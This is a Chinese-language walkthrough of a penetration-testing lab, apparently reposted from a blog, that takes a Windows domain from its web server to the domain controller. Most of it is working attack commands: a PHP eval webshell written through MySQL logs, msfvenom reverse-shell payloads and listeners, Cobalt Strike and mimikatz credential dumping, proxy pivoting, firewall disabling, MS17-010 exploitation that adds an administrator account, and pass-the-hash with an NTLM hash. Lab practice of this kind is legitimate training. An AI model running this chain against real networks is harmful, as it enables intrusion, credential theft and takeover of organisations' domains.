0


红日内网渗透靶场1


网络拓扑

环境配置

攻击机:kali

kali IP:192.168.123.129

WEB服务器:win7

  1. 外网IP:192.168.123.153

  2. 内网IP:192.168.52.143

域成员:win 2k3

IP:192.168.52.141

域控服务器:win 2008

网卡IP:192.168.52.138

测试网络连通性

win7 ping win2k 、win2008

图-1


图-2


信息收集

使用nmap对192.168.123.0/24网段进行扫描

nmap -sV -sS -A 192.168.123.0/24

图-3


发现80和3306端口开启,访问页面http://192.168.123.143/发现页面存在大量信息泄露,收集有效信息。

图-4


发现网站底部有一个MySQL数据库连接检测:

图-5


尝试输入用户名和密码root/root,成功连接

图-6


使用御剑扫描目录发现网站备份文件和phpadmin后台管理界面

图-7


打开备份文件发现网站源码,打开robots.txt发现网站CMS为yxcms,访问进入网站首页

图-8


漏洞利用

信息泄露+弱口令

网站泄露后台地址和用户密码,且用户密码为弱口令

图-9


使用泄露的用户名密码成功登录网站后台界面

图-10


yxcms****留言本XSS存储型漏洞

利用存储型xss,在前台提交带有XSS代码的留言,

图-11


后台审核成功弹出XSS弹窗

图-12


审核通过之后,前台同样成功弹窗

图-13


yxcms****后台任意文件读写漏洞

在后台创建新模板模块创建内容为一句话木马的新模板

图-14


图-15


通过前面的备份文件知道文件保存的目录

http://192.168.123.153/yxcms/protected/apps/default/view/default/

图-16


使用蚁剑成功连接shell

图-17


访问phpmyadmin,尝试使用弱口令root/root,可以登入

图-18


利用日志文件写入木马

**1.**开启日志功能

set global slow_query_log=’on’;

**2.**设置日志存储路径

set global general_log_file='C:/phpStudy/WWW/shell.php';

**3.****执行sql语句,写入一句话木马 **

select "<?php eval($_POST[cmd]);?>"

成功getshell

图-19


图-20


使用msf****反弹shell

生成Windows后门程序反弹shell:

Msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.123.129 lport=6666 -f exe -o shell.exe

图-21


启动监听:

use exploit/multi/handler

set payload windows/x64/meterpreter/reverse_tcp

set lhost 192.168.123.129

set lport 6666

show options

run

图-22


将生成的shell.exe利用蚁剑上传至win7并运行

成功反弹shell

图-23


**上线cs **

图-24


先创建监听器

图-25


生成后门

图-26


通过蚁剑把exe上传执行,成功上线

图-27


mimikatz****工具抓取本机用户名密码:

图-28


图-29


msf****上线cs

先记录要返回session的id,msf载入use exploit/windows/local/payload_inject模块,设置payload一定要与cs监听器保持一致:

图-30


lport****写的是cs监听端口

lhost****写的是cs主机ip

图-31


设置一个监听当msf发起攻击的时候,cs就会上线

图-32


成功上线:

图-33


添加路由到目标环境网络,使得msf能够通过win7路由转发访问192.168.25.0/24网段

**run get_local_subnets #**查看路由信息

**run autoroute -s 192.168.52.0/24 #**添加一条路由

图-34


设置代理可以访问内网:

使用msf的socks代理模块

use auxiliary/server/socks

use auxiliary/server/socks_proxy

图-35


文本编辑 vim /etc/proxychains.conf,在最后一行加上socks5代理服务器

Socks5 192.168.123**.**129 1080

图-36


内网信息收集

使用msf查看补丁信息:run post/windows/gather/enum_patches

图-37


安装软件信息:run post/windows/gather/enum_applications

图-38


查看路由信息:run get_local_subnets

图-39


arp****扫描52网段:run post/windows/gather/arp_scanner rhosts=192.168.52.0/24

图-40


关闭防火墙,开启3389进行远程连接

**NetSh Advfirewall set allprofiles state off //**关闭防火墙

**wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 //**开启3389

使用获得的账户密码登录

图-41


发现当前主机安装了Nmap

直接利用这台主机上的工具来进行内网主机的端口扫描

图-42


进行端口扫描nmap -Pn -sT -p 1-1000 192.168.52.138

图-43


nmap -Pn -sT -p 1-1000 192.168.52.141

图-44


继续使用 nmap 进行主机漏洞扫描,查看是否存漏洞

**nmap --script=vuln 192.168.52.128 **存在ms17-010 漏洞

图-45


**nmap --script=vuln 192.168.52.141 **

存在ms08-067、ms17-010 漏洞

图-46


内网攻击

漏洞测试是否存在ms17-010:

search ms17-010 //查找ms17-010模块

use auxiliary/scanner/smb/smb_ms17_010 //使用此模块

set rhosts 192.168.52.138 192.168.52.141 //将rhosts参数设置为138 141两个IP

run //运行

图-47


**use auxiliary/admin/smb/ms17_010_command //**使用该模块

**show options //**查看配置

**set command net user test @qwer1234 /add //**添加用户

**set rhosts 192.168.52.138 //**添加目标IP

**run //**运行

图-48


set command net localgroup administrators test /add //将test添加到管理组

**run //**运行

图-49


**set command net localgroup administrators //**查看管理组成员

**run //**运行

图-50


**set command NetSh Advfirewall set allprofiles state off //**关闭防火墙

**run //**运行

图-51


**use exploit/windows/smb/ms17_010_psexec //**使用该模块

**show options //**查看配置

**set rhosts 192.168.52.138 //**设置目标IP

**set payload windows/meterpreter/bind_tcp //**选择正向连接

**run //**运行

图-52


成功拿到域控shell

横向移动

通过pwdump7得到Hash值

图-53


在Win7运行mimikatz哈希传递攻击脚本

mimikatz "privilege::debug" "sekurlsa::pth /user:Administrator /domain:GOD /ntlm:2E8B24E00BD703E52CFE327A072006B0

图-53


图-54


本文转载自: https://blog.csdn.net/weixin_47781572/article/details/127244821
版权归原作者 王木木吖 所有, 如有侵权,请联系我们删除。

“红日内网渗透靶场1”的评论:

还没有评论